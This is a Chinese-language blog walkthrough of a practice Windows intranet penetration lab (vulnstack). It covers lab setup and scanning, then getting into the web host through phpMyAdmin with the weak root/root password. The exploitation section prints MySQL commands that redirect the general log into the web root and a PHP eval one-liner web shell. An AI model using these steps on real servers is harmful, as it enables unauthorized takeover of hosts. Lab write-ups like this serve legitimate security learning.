最近某個公眾號介紹了網上的一套環境,這個環境是多個Windows靶機組成的,涉及到內網滲透,正好Windows和內網滲透一直沒怎么接觸過,所以拿來學習下。
下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
環境配置和檢查
加上kali一共四台虛擬機。
win7 x64
需要配置兩張網卡,一個在內網網段,一個在外網網段,配置如下(VM默認只有一張網卡,自己添加一個網絡適配器就好了),內網網絡配置為特定虛擬網絡:
兩台內網服務器,網絡配置如下:
kali虛擬機應只能連到外網,也就是和win7的外網網卡在同一網段,但無法訪問內網網段,網絡配置如下:
啟動win7虛擬機C盤下的phpstudy:
最后內網的三台虛擬機互相ping一下,保證能ping通。
信息收集
kali掃一下ip,win7外網網址為:192.168.174.135:
對win7進行端口掃描:
80端口是一個網站,發現網站底部有一個MySQL數據庫連接檢測:
嘗試輸入用戶名和密碼root/root,連上了。。。就。。。挺突然的。。。
再對網站進行掃描,發現phpinifo.php和phpmyadmin頁面:
漏洞利用
第一步信息收集找到了php后台管理頁面以及mysql的root密碼,接下來嘗試利用這個漏洞getshell從而控制發布網站的這台主機。
訪問http://192.168.174.135/phpmyadmin/,並用弱密碼root/root登錄,利用方式有兩種:
1. 利用into outfile直接寫入shell文件
show variables like '%secure%'
很遺憾secure_file_priv的值是NULL,也就是不允許導入導出,如果嘗試寫入shell文件會失敗:
2.利用日志getshell
開啟mysql日志功能:
show global variables like '%general%'
set global general_log='ON'
將日志文件的存放位置修改為當前網站的根目錄:
set global general_log_file = 'C:/phpStudy/WWW/shell.php'
執行語句:
SELECT '<?php @eval($_POST["cmd"]); ?>'
用蟻劍連接:
當前域名為god,登錄用戶是admin:
本文僅用於技術學習和交流,嚴禁用於非法用途,否則產生的一切后果自行承擔。
如需轉載,請注明出處,這是對他人勞動成果的尊重。